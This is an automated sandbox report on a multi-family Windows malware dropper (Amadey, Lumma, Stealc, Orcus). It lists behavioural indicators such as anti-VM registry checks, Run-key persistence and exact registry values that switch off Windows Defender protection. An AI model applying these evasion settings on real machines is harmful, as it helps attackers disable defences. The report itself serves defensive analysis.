Malware Analysis Report

2025-01-22 14:54

Sample ID 241206-cqe7ksvmew
Target 1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe
SHA256 1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e
Tags
amadey gcleaner lumma orcus stealc ta505 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e

Threat Level: Known bad

The file 1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma orcus stealc ta505 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan

Stealc family

Orcus

Ta505 family

Lumma Stealer, LummaC

Orcus family

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies Windows Defender Real-time Protection settings

GCleaner

Amadey

Gcleaner family

Stealc

Amadey family

Lumma family

TA505

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Orcurs Rat Executable

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks computer location settings

Checks BIOS information in registry

Identifies Wine through registry keys

Executes dropped EXE

Windows security modification

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

AutoIT Executable

Drops file in Windows directory

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Unsigned PE

Modifies registry class

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Runs net.exe

Suspicious use of SendNotifyMessage

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 02:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 02:16

Reported

2024-12-06 02:19

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3564 created 3364 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

TA505

ta505

Ta505 family

ta505

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1dd8bdd825.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012576001\\1dd8bdd825.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\69efc78da7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012577001\\69efc78da7.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3da59fcc7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012578001\\b3da59fcc7.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f56e441c8f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012575001\\f56e441c8f.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
